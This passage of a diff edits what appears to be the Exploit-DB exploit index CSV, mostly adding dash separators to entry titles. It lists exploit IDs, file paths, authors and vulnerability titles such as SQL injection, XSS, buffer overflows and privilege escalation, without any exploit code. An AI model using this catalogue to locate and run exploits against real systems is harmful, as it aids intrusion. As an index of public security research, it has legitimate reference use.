Buffer Overflow",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet Driver Manager Privileged toString() Remote Code Execution",2013-06-11,Metasploit,multiple,remote,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 (edit_event.php eventid param) - SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - (edit_event.php eventid param) SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26137,platforms/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash PoC",2013-06-12,npn,windows,dos,0 26138,platforms/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",hardware,dos,554 26139,platforms/windows/dos/26139.txt,"Gaim AIM/ICQ Protocols - Multiple Vulnerabilities",2005-08-10,"Brandon Perry",windows,dos,0 @@ -23304,7 +23304,7 @@ id,file,description,date,author,platform,type,port 26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 - Index.php Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps,0 26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - Index.php HTML Injection",2005-08-16,"John Cobb",php,webapps,0 26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - SearchResults.php Multiple SQL Injection",2005-08-17,h4cky,php,webapps,0 -26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 NewsCategoryForm.php NewsMode Parameter XSS",2005-08-17,h4cky,php,webapps,0 +26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 - NewsCategoryForm.php NewsMode Parameter XSS",2005-08-17,h4cky,php,webapps,0 26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - SearchResults.php Multiple Parameter XSS",2005-08-17,h4cky,php,webapps,0 26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - admin_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26163,platforms/php/webapps/26163.txt,"PHPTB Topic Board 2.0 - board_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 @@ -23324,7 +23324,7 @@ id,file,description,date,author,platform,type,port 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26179,platforms/php/webapps/26179.txt,"Land Down Under 800/801 list.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 -26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 forums.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 +26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 - forums.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26181,platforms/php/webapps/26181.txt,"Land Down Under 800 journal.php w Parameter XSS",2005-08-20,bl2k,php,webapps,0 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - index.php Multiple Parameter XSS",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 Browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 @@ -23334,13 +23334,13 @@ id,file,description,date,author,platform,type,port 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module moderate Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b user.php htmltext Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL-viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 -26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 Unauthorized Access",2005-08-23,rgod,php,webapps,0 +26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps,0 26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusion",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 LSQ File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 -26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 +26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog Html Injection",2005-08-24,ali202,php,webapps,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 HTTP CONNECT Unauthorized Access Weakness",2005-08-25,"Oliver Karow",linux,remote,0 26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - Error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 @@ -23406,9 +23406,9 @@ id,file,description,date,author,platform,type,port 26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 - Index.php Cross-Site Scripting",2005-09-14,trueend5,php,webapps,0 26262,platforms/php/webapps/26262.txt,"Digital Scribe 1.4 Login SQL Injection",2005-09-15,rgod,php,webapps,0 26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - Search_Result.php SQL Injection",2005-09-15,alexsrb,php,webapps,0 -26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 topic.php tid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 +26264,platforms/php/webapps/26264.txt,"DeluxeBB 1.0 - topic.php tid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26265,platforms/php/webapps/26265.txt,"DeluxeBB 1.0 misc.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 +26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26333,platforms/asp/webapps/26333.html,"Aenovo /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 @@ -23468,11 +23468,11 @@ id,file,description,date,author,platform,type,port 26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0 26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service",2005-10-11,anonymous,windows,dos,0 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0 -26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 +26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0 26345,platforms/php/webapps/26345.txt,"YaPig 0.95 b view.php img_size Parameter XSS",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 -26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0 -26347,platforms/php/webapps/26347.txt,"Gallery 2.0 Main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 +26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0 +26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - Main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 26349,platforms/php/webapps/26349.txt,"Complete PHP Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - Search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0 @@ -23508,7 +23508,7 @@ id,file,description,date,author,platform,type,port 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum recommend.php ID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0 -26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0 +26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - Detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - Index.php Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - Index.php Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0 26388,platforms/php/webapps/26388.txt,"Nuked-Klan 1.7 Download Module dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 @@ -23519,7 +23519,7 @@ id,file,description,date,author,platform,type,port 26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php XSS",2005-05-20,"Tobias Klein",php,webapps,0 26394,platforms/php/webapps/26394.txt,"MWChat 6.8 Chat.php SQL Injection",2005-05-21,rgod,php,webapps,0 26395,platforms/php/webapps/26395.txt,"Basic Analysis And Security Engine 1.2 Base_qry_main.php SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 -26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 Usercp.php SQL Injection",2005-10-26,Animal,php,webapps,0 +26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 - Usercp.php SQL Injection",2005-10-26,Animal,php,webapps,0 26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 GameID Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps,0 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 @@ -23528,23 +23528,23 @@ id,file,description,date,author,platform,type,port 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder (.m3u) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"MediaCoder PMP Edition 0.8.17 - (.m3u) Buffer Overflow Exploit",2013-06-24,metacom,windows,local,0 -26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 (play.php gid param) - SQL Injection",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 +26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - (play.php gid param) SQL Injection",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault OSSIM Open Source SIEM 4.1 - Multiple SQL Vulnerabilities",2013-06-24,"Glafkos Charalambous ",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.php SQL Injection",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 26408,platforms/php/webapps/26408.txt,"phpEventCalendar 0.2.3 - Multiple Vulnerabilities",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0 -26410,platforms/php/webapps/26410.py,"Collabtive 1.0 (manageuser.php task param) - SQL Injection",2013-06-24,drone,php,webapps,0 +26410,platforms/php/webapps/26410.py,"Collabtive 1.0 - (manageuser.php task param) SQL Injection",2013-06-24,drone,php,webapps,0 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - (.m3u) Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0 26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption PoC",2013-06-24,"Debasish Mandal",windows,dos,0 26414,platforms/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",php,webapps,0 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 -26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 (global.php id param) - SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 +26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id param) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Local Privilege Escalation",2013-06-24,Metasploit,windows,local,0 -26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 +26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0 26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0 @@ -23552,7 +23552,7 @@ id,file,description,date,author,platform,type,port 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts Multiple SQL Injection",2005-10-26,"farhad koosha",asp,webapps,0 -26427,platforms/php/webapps/26427.txt,"GCards 1.43 News.php SQL Injection",2005-10-26,svsecurity,php,webapps,0 +26427,platforms/php/webapps/26427.txt,"GCards 1.43 - News.php SQL Injection",2005-10-26,svsecurity,php,webapps,0 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke HTML Injection",2005-10-26,bhfh01,php,webapps,0 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0 @@ -23572,13 +23572,13 @@ id,file,description,date,author,platform,type,port 26444,platforms/asp/webapps/26444.txt,"Comersus BackOffice 4.x/5.0/6.0 comersus_backoffice_supportError.asp error Parameter XSS",2005-10-31,_6mO_HaCk,asp,webapps,0 26445,platforms/asp/webapps/26445.pl,"Comersus BackOffice 4.x/5.0/6.0 /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 -26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 HTML Injection",2005-11-01,gladiator,php,webapps,0 +26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - (.lst) Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Local Privilege Escalation",2013-06-26,Metasploit,win_x86,local,0 -26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type param) Remote Code Execution",2013-06-26,infodox,php,webapps,0 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB Index.php Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.php SQL Injection",2005-11-01,almaster,php,webapps,0 @@ -23594,7 +23594,7 @@ id,file,description,date,author,platform,type,port 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 show_news.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 ShowGallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 -26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 +26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit",2013-06-27,"Jacob Holcomb",windows,remote,21 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0 @@ -23602,15 +23602,15 @@ id,file,description,date,author,platform,type,port 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 U2U.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 -26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 admin.php Multiple Parameter XSS",2005-11-07,benjilenoob,php,webapps,0 +26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter XSS",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 Advance Program Control Bypass Weakness",2005-11-07,Tr0y-x,windows,local,0 -26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 Admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 +26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 - Admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 -26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 +26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 26489,platforms/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",linux,dos,0 @@ -23625,7 +23625,7 @@ id,file,description,date,author,platform,type,port 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.php File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 -26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection",2005-11-12,bhs_team,php,webapps,0 +26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel Username SQL Injection",2005-11-12,bhs_team,php,webapps,0 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - Module.php Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum ForumReply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 @@ -23640,7 +23640,7 @@ id,file,description,date,author,platform,type,port 26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 -26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 +26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - Profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 design.php delete Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 @@ -23655,7 +23655,7 @@ id,file,description,date,author,platform,type,port 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - CSRF",2013-07-01,"Sven Wurth",hardware,webapps,0 26529,platforms/multiple/remote/26529.rb,"Java Applet ProviderSkeleton Insecure Invoke Method",2013-07-01,Metasploit,multiple,remote,0 26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'unserialize()' Function Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 -26531,platforms/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote,0 +26531,platforms/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote,0 26532,platforms/jsp/webapps/26532.txt,"Revize CMS Query_results.JSP SQL Injection",2005-11-17,Lostmon,jsp,webapps,0 26533,platforms/jsp/webapps/26533.txt,"Revize CMS Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0 @@ -23663,10 +23663,10 @@ id,file,description,date,author,platform,type,port 26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart Shopadmin.ASP HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 Options.php and Viewforum.php SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 -26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 Popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 +26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - Popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 SVG Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 26541,platforms/php/webapps/26541.txt,"SimplePoll Results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 -26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 +26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 26543,platforms/php/webapps/26543.txt,"APBoard Thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - Files.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0 @@ -23683,7 +23683,7 @@ id,file,description,date,author,platform,type,port 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 26558,platforms/windows/dos/26558.txt,"WinAmp 5.63 - Stack-based Buffer Overflow",2013-07-02,"Julien Ahrens",windows,dos,0 -26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 +26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26560,platforms/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - Process.php SQL Injection",2005-11-23,r0t,php,webapps,0 26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 SubCategory.php cl Parameter SQL 